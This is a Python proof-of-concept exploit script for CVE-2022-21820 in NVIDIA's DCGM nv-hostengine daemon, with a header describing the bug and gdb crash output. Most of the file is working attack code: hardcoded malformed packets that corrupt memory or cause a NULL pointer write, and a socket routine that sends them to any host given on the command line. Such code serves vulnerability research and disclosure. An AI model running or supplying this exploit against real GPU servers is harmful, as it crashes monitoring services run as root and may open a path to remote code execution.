#!/usr/bin/python3
# -*- coding: UTF-8 -*-
#
# heart.py
#
# NVIDIA Data Center GPU Manager Remote Memory Corruption Vulnerability
#
# Jeremy Brown [jbrown3264/gmail]
#
# NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health
# data. nv-hostengine is a daemon that by default listens on the loopback interface,
# but can also listen on the network for requests coming in on port 5555 (remote mgmt).
# A native client named DCGMI allows users to make requests to the daemon to support
# a variety of functions. Malformed packets can cause the daemon (running as root
# or user account) to crash or potentially result in code execution.
#
# More info: https://docs.nvidia.com/datacenter/dcgm/latest/index.html
#
# Tested on Ubuntu 20.04 x64 with package datacenter-gpu-manager v2.3.1 (< v2.3.5 affected)
#
# $ ./heart.py 10.0.0.201 --trigger pkt3-mem
#
# $ gdb `which nv-hostengine`
# (gdb) r -b ALL -n
# nv-hostengine running as non-root. Some functionality will be limited.
# Started host engine version 2.3.1 using port number: 5555
# ...
# Thread 2 "nv-hostengine" received signal SIGSEGV, Segmentation fault.
#
# (gdb) i r
# rax 0x7ffbb3dbd010 140719031046160
# rbx 0x7ffff771ac70 140737344810096
# rcx 0x7ffbb3dbd010 140719031046160
# rdx 0x424242420 17786217504
# rsi 0x7ffff771aee4 140737344810724
# rdi 0x7ffbb3dbd010 140719031046160
# rbp 0x7ffff771ac40 0x7ffff771ac40
# rsp 0x7ffff771abe8 0x7ffff771abe8
# r8 0x424242420 17786217504
# r9 0x0 0
# r10 0x7ffbb3dbd010 140719031046160
#
# CVE‑2022‑21820
#
import os
import sys
import argparse
import time
import shutil
import signal
import socket
DEFAULT_PORT = 5555
PKT_START = b'\xad\xbc\xbc\xad'
#
# Trigger #1: Memory Corruption via malformed packet 3
#
TRIGGER_ONE_PKT_1 = PKT_START + \
b'\x01\x00\x00\x00\x11\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x0f\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00'
TRIGGER_ONE_PKT_2 = PKT_START + \
b'\x01\x00\x00\x00\x1a\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x0a\x18\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00\x48\xa4\xec\xc4\x94\x81\x83\xf5\x02'
# 0x84 maps to 'B' here and crashes with rdx/r8=0x424242420
TRIGGER_ONE_PKT_3 = PKT_START + \
b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01\x00' + \
b'\x84' * 51 + \
b'\x00' * 488 + \
b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' + \
b'\x00' * 207 + \
b'\x01\x00\x00\x00'
#
# Trigger #2: NULL ptr write via malformed packet 4
#
TRIGGER_TWO_PKT_1 = TRIGGER_ONE_PKT_1
TRIGGER_TWO_PKT_2 = TRIGGER_ONE_PKT_2
TRIGGER_TWO_PKT_3 = PKT_START + \
b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01' + \
b'\x00' * 12 + \
b'\x01\x00\x00\x00\x01' + \
b'\x00' * 523 + \
b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' + \
b'\x00' * 207 + \
b'\x01\x00\x00\x00'
# 0x79 triggers crash
TRIGGER_TWO_PKT_4 = PKT_START + \
b'\x04\x00\x00\x00\x1c\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x1a\x08\x04\x10\x03\x18' + \
b'\xff' * 9 + \
b'\x01' + \
b'\x79' + \
b'\x00\x42\x07\xd2\x01\x04\x08\x03\x10\x00'
class Heart(object):
def __init__(self, args):
self.host = args.host
self.trigger = args.trigger
def run(self):
if(self.trigger == None):
print("error: choose which bug use via --trigger")
return -1
sock = self.getSock()
if(sock == None):
return -1
try:
sock.connect((self.host, DEFAULT_PORT))
except Exception as error:
print("connect() failed: %s\n" % error)
return -1
if(self.trigger == 'pkt3_mem'):
if(self.sendPacket(sock, TRIGGER_ONE_PKT_1) < 0):
print("failed to send/recv packet 1\n")
return -1
if(self.sendPacket(sock, TRIGGER_ONE_PKT_2) < 0):
print("failed to send/recv packet 2\n")
return -1
if(self.sendPacket(sock, TRIGGER_ONE_PKT_3) < 0):
print("failed to send/recv packet 3\n")
return -1
if(self.trigger == 'pkt4_null'):
if(self.sendPacket(sock, TRIGGER_TWO_PKT_1) < 0):
print("failed to send/recv packet 1\n")
return -1
if(self.sendPacket(sock, TRIGGER_TWO_PKT_2) < 0):
print("failed to send/recv packet 2\n")
return -1
if(self.sendPacket(sock, TRIGGER_TWO_PKT_3) < 0):
print("failed to send/recv packet 3\n")
return -1
if(self.sendPacket(sock, TRIGGER_TWO_PKT_4) < 0):
print("failed to send/recv packet 4\n")
return -1
print("done\n")
return 0
def getSock(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
except Exception as error:
print("socket() failed: %s\n" % error)
return None
return sock
def sendPacket(self, sock, pkt):
try:
sock.send(pkt)
except Exception as error:
print("socket send error: %s\n" % error)
return -1
try:
sock.recv(256)
except Exception as error:
# print("socket recv error: %s\n" % error)
return 0 # expected for pkt3_mem
return 0
def signalExit(signum, frame):
sys.exit(-1)
def arg_parse():
parser = argparse.ArgumentParser()
parser.add_argument("host",
type=str,
help="target host")
parser.add_argument("--trigger",
"--trigger",
type=str,
choices=['pkt3_mem', 'pkt4_null'],
help="which bug to trigger")
args = parser.parse_args()
return args
def main():
signal.signal(signal.SIGINT, signalExit)
args = arg_parse()
rh = Heart(args)
result = rh.run()
if(result > 0):
sys.exit(-1)
if(__name__ == '__main__'):
main()
